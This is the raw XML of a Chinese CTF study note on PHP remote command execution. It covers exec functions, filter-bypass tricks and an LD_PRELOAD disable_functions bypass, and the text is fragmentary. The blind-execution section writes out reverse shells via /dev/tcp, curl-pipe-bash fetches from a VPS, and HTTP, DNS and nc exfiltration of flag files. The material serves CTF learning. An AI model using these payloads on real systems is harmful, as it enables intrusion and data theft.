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0545"/>
      <w:bookmarkStart w:id="1" w:name="_Toc15835"/>
      <w:bookmarkStart w:id="2" w:name="_Toc15405"/>
      <w:bookmarkStart w:id="3" w:name="_Toc23205"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>RCE小结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="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601"/>
        <w15:color w:val="DBDBDB"/>
      </w:sdtPr>
      <w:sdtEnd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RCE小结</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc10545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基础知识</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc16693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PHP命令执行函数</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20914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PHP代码执行函数</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc20045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命令拼接符</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc26425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注释符号</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc25970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二、 解题思路</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc28734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绕过技巧</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24098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2. </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:hint="eastAsia"/>
              <w:bCs w:val="0"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
            <w:t>无回显命令执行</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc19854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无参数命令执行</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc26677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Disable_functions绕过</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc24817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三、 例题</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc21080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死亡ping命令</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc2625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[极客大挑战 2019]RCE ME</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc8538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后记</w:t>
          </w:r>
          <w:r>
            <w:tab/>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> PAGEREF _Toc13829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  <w:bookmarkStart w:id="4" w:name="_Toc23278"/>
      <w:bookmarkStart w:id="5" w:name="_Toc228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1580"/>
      <w:bookmarkStart w:id="7" w:name="_Toc16693"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>基础知识</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/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在CTF中RCE(Remote Code/Command Exec)即远程命令/代码执行。命令执行是指通过提交恶意构造的参数破坏命令语句结构，从而达到执行恶意命令的目的。当用户可以控制命令执行函数中的参数是，将可注入恶意系统命令到正常命令中，造成命令执行攻击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8" w:name="_Toc5658"/>
      <w:bookmarkStart w:id="9" w:name="_Toc1147"/>
      <w:bookmarkStart w:id="10" w:name="_Toc21616"/>
      <w:bookmarkStart w:id="11" w:name="_Toc20914"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PHP命令执行函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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system():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System()函数将结果直接输出，命令成功后返回输出的最后一行，失败返回False。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shell_exec():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shell_exec () 通过 shell 环境执行命令(这就意味着这个方法只能在linux或mac os的shell环境中运行)，并且将完整的输出以字符串的方式返回。如果执行过程中发生错误或者进程不产生输出，则返回 NULL。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exec()：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 () 执行一个外部程序。返回命令执行结果的最后一行内容。不显示回显。如果想要获取命令的输出内容，请确保使用output 参数，或者利用这个函数来构建反弹shell。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exec()函数基本用法：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exec ( string $command [, array &amp;$output [, int &amp;$return_var ]] )；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$command：表示要执行的命令。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$output:如果提供了 output 参数， 那么会用命令执行的输出填充此数组， 每行输出填充数组中的一个元素。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Passthru():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passthru — 执行外部程序并且显示原始输出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反引号：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反引号可以用来在PHP代码中直接执行系统命令，但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>想要回显的话还需要一个 echo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如果题目代码中没有 echo，所以我们需要配合curl并使用VPS进行外带。</w:t>
      </w:r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花括号{command,} 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例：    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>echo ls|sh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echo cat /flag|bash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bookmarkStart w:id="12" w:name="_Toc14577"/>
      <w:bookmarkStart w:id="13" w:name="_Toc16813"/>
      <w:bookmarkStart w:id="14" w:name="_Toc20045"/>
      <w:bookmarkStart w:id="15" w:name="_Toc19766"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PHP代码执行函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
      <w:bookmarkEnd w:id="15"/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在PHP下，允许命令执行的函数有：eval()、assert()、preg_replace()、**${}**等等。如果页面中存在这些函数并且对于用户没有做严格的过滤，那么就可能造成远程代码执行漏洞。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Style w:val="17"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>{}执行代码（在双引号中倘若有${}出现，那么{}内的内容将被当做php代码块来执行。）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方法：${php代码}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bookmarkStart w:id="16" w:name="_Toc31245"/>
      <w:bookmarkStart w:id="17" w:name="_Toc26425"/>
      <w:bookmarkStart w:id="18" w:name="_Toc24177"/>
      <w:bookmarkStart w:id="19" w:name="_Toc18636"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令拼接符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19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在windows和linux下的命令拼接符有： ；、&amp;、&amp;&amp;、|、||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PHP环境：%0a 换行符；%0d 回车符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20" w:name="_Toc1473"/>
      <w:bookmarkStart w:id="21" w:name="_Toc544"/>
      <w:bookmarkStart w:id="22" w:name="_Toc25970"/>
      <w:bookmarkStart w:id="23" w:name="_Toc30374"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注释符号</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/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windows下的注释符为“::”，linux下的注释符为“#”，在bash脚本中用的比较多。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b/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc20923"/>
      <w:bookmarkStart w:id="25" w:name="_Toc24516"/>
      <w:bookmarkStart w:id="26" w:name="_Toc30848"/>
      <w:bookmarkStart w:id="27" w:name="_Toc28734"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/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outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc19455"/>
      <w:bookmarkStart w:id="29" w:name="_Toc17142"/>
      <w:bookmarkStart w:id="30" w:name="_Toc24098"/>
      <w:bookmarkStart w:id="31" w:name="_Toc3816"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>绕过技巧</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:bookmarkEnd w:id="29"/>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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过滤cat、flag等关键字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代替关键字，如在linux系统下cat命令可以用以下命令来替代：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more:一页一页的显示档案内容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less:与 more 类似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head:查看头几行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tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示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tail:查看尾几行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nl：显示的时候，顺便输出行号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od:以二进制的方式读取档案内容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vi:一种编辑器，这个也可以查看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vim:一种编辑器，这个也可以查看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sort:可以查看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uniq:可以查看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-f:报错出具体内容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/flag 2&gt;%261  //报错出文件内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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空格绕过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 ${IFS},$IFS$9,&lt;&gt;,%20等绕过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转义字符或引号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例如：ca\t /fl\ag，cat fl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ag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偶读拼接绕过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例：a=fl;b=ag;cat $a$b ======&gt; cat flag;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内联执行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例：cat `ls` =======&gt; cat flag.php;cat index.php (假设目录下有index.php和flag.php)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类似的还有$(command)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编码绕过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Base64编码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flag{XXXX}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|base64 -d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16进制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flag{XXXX}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|xxd -r -p|bash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-p 将纯16进制转储的反向输出打印为ASCII格式。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Shellcode 编码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过滤文件名绕过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通配符绕过：cat f***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利用未初始化变量$u绕过： cat /etc$u/passwd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(可绕过CloudFlare WAF)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读取文件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"file://flag"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file:///flag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/flag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 -c /flag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Bash -v /flag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 /flag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用[]匹配绕过关键字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例：c[a]t =&gt;cat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grep绕过关键词过滤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例：grep{ flag.php =&gt; grep{ f???????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使用~$()构造数字</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1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t>$((~$(())))=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>$(())=0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过滤目录分隔符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采用多个管道命令，执行多个命令来绕过；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例：cat /flag/flagg ====&gt;cd flag;cat flagg;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过滤分隔符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可以使用%0a代替；PHP中还可用?&gt;来代替最后一个; 。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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字符串长度受限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091940" cy="236664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\是指换行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ls -t将文件按时间排序输出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sh命令可以从一个文件中读取命令来执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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无数字字母getshell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思路：取反~、异或^、或运算|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= "_GET";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urlencode(~$code);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异或：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$flag = "s y s t e m";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$arr = explode(' ', $flag);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($arr as $key =&gt; $value)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"%".dechex(ord($value)^0xff);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"^";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($arr as $key =&gt; $value)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"%ff";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outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc761"/>
      <w:bookmarkStart w:id="33" w:name="_Toc73"/>
      <w:bookmarkStart w:id="34" w:name="_Toc23742"/>
      <w:bookmarkStart w:id="35" w:name="_Toc19854"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>无回显命令执行</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
      <w:bookmarkEnd w:id="33"/>
      <w:bookmarkEnd w:id="34"/>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5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Shell_exec()等无回显函数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判断：利用sleep()判断；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利用：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利用复制、压缩、写shell等方法，然后访问生成的对应文件；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27508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7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http通道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在自己的公网服务器站点根目录写入php文件：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$data =$_GET['data'];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$f = fopen("flag.txt", "w");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fwrite($f,$data);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fclose($f);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之后在目标服务器发送下面其中任意一条payload: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http://*.*.*.**/record.php?data=`cat flag.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>|base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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http://*.*.*.*/record.php?data=`cat flag.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>|base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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解码得到flag。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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DNS通道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curl `command`.域名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用&lt;替换读取文件中的空格，且对输出结果base64编码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`cat&lt;flag.php|base64`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拼接域名(最终构造结果)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`cat&lt;flag.php|base64`.v4utm7.ceye.io</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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反弹shell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利用条件：目标服务器可以向可通信的而公网服务器发起http请求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#1.首先在公网服务器使用nc命令监听端口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nc -lvp 4444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或nc -vv -lp 4444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#2.然后在公网服务器上写一个文件(我写入到qwzf文件)，内容是下面命令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-i &gt;&amp; /dev/tcp/x.x.x.165/4444 0&gt;&amp;1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#3.最终浏览器上执行的payload(实际上就是在目标机执行curl x.x.x.165:8002/qwzf|bash)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ip=|curl x.x.x.165:8002/qwzf|bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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msf反向回连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利用条件：目标服务器可以向可通信的公网服务器发起http请求。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首先远程服务器用msf监听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93820" cy="15316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目标服务器执行下面命令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ip=|bash -i &gt;&amp; /dev/tcp/xxxxx(vps公网ip)/4444 0&gt;&amp;1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#如果上面这条命令在浏览器上执行失败。那么要将上面这条命令写入公网服务器上的一个文件中，在msf开始监听后，在测试点执行下面命令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ip=|curl x.x.x.165:8002/qwzf|bash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之后在公网服务器接受shell,得到flag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sessions -i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利用条件：要求目标服务器也有nc工具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#1.公网服务器监听4444端口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 -tlp 4444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#2.目标服务器执行如下命令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ip=|nc -t x.x.x.165 4444 &lt; flag.php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-u参数调整为udp,当tcp不能使用的时候使用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#1.公网服务器监听4444端口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 -ulp 4444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#2.目标服务器执行如下命令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ip=|nc -u x.x.x.165 4444 &lt; flag.php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curl上传文件读取源码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首先获取Collaborator Client分配给Burp的链接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然后拼接payload并在命令执行处提交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查看Collaborator Client收到的数据，得到flag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outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc8062"/>
      <w:bookmarkStart w:id="37" w:name="_Toc26677"/>
      <w:bookmarkStart w:id="38" w:name="_Toc282"/>
      <w:bookmarkStart w:id="39" w:name="_Toc24093"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>无参数命令执行</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
      <w:bookmarkEnd w:id="37"/>
      <w:bookmarkEnd w:id="38"/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判断：题目有以下限制：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="711835"/>
            <wp:effectExtent l="0" t="0" r="635" b="444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无参数顾名思义因为代码的限制，函数中不能有参数，这样我们往往通过函数的嵌套来绕过。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getenv():</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>获取当前环境变量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Getallheaders():获取http头</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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  <w:t>session_id()：可以获取到当前的会话ID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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  <w:t>scandir():扫描当前目录下的文件,并以数组的形式返回</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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  <w:t>localeconv():返回一个包含本地数字及货币格式信息的数组,该数组的第一项就是'.'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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  <w:t>current():返回当前数组的当前单元,默认值是第一个</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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可利用的函数还有很多，我们可以根据需求来相应的使用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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一个简单的例子：禁止套娃</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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.git泄漏拿到源码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4302125" cy="2404110"/>
            <wp:effectExtent l="0" t="0" r="10795" b="3810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发现有三层过滤，第二层就是无参数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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我们先想办法来构造payload读取当前的目录，根据以上给出的函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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用scandir()来扫描文件，用current()和</w:t>
      </w:r>
      <w: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  <w:t>localeconv()</w:t>
      </w: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返回当前目录即：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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 w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>payload: print_r(scandir(pos(localeconv())));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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8"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>接着，我们要读取flag.php的内容</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>array_reverse():以相反的顺序返回数组</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>next():将数组中的内部指着指向下一个元素并输出</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="13"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>show_source()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 函数对文件进行语法高亮显示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="1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t>array_reverse()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将数组反向，在用next读取第二个数据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7"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>print_r(next(array_reverse(scandir(pos(localeconv())))));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="17"/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ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>payload:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>show_source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(next(array_reverse(scandir(pos(localeconv())))));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="17"/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883660" cy="1031875"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445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outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc10296"/>
      <w:bookmarkStart w:id="41" w:name="_Toc20677"/>
      <w:bookmarkStart w:id="42" w:name="_Toc24817"/>
      <w:bookmarkStart w:id="43" w:name="_Toc32591"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Disable_functions绕过</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
      <w:bookmarkEnd w:id="41"/>
      <w:bookmarkEnd w:id="42"/>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267325" cy="1678940"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1270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disable_functions的bypass有很多方法，这里主要介绍比较常见的几种。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Ld_preload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利用场景：实现了代码执行，未实现命令执行，且没有禁用mail函数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利用条件：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（1）没有禁用mail函数。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（2）站点根目录具有写文件权限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或其他目录具有写文件权限，并且可以在url上跳转到其他目录访问上传的php文件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或其他目录具有写文件权限，利用代码执行实现本地文件包含，包含最后要访问的php文件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利用方法1：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编写hack.c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26280" cy="237744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用gcc转换为os文件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7"/>
        </w:rPr>
        <w:t>gcc -shared -fPIC hack.c -o getflag.so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将生成的os文件上传到/tmp目录下，同时上传引导的PHP文件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62400" cy="1699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执行cmd=include(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shell.php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)，在/tmp/wx.txt拿到flag。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利用方法2：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步骤大致和方法一相同，不过可以连续执行任意命令。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编写hack.c并编译；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t>#include &lt;stdlib.h&gt;#include &lt;stdio.h&gt;#include &lt;string.h&gt;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t>int geteuid()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17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</w:t>
      </w:r>
      <w:r>
        <w:t>const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>* cmdline = getenv(</w:t>
      </w:r>
      <w:r>
        <w:t>"EVIL_CMDLINE"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r>
        <w:t>//获得系统的环境变量EVIL_CMDLINE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</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t>(getenv(</w:t>
      </w:r>
      <w:r>
        <w:t>"LD_PRELOAD"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">) == </w:t>
      </w:r>
      <w:r>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">){ </w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
        </w:rPr>
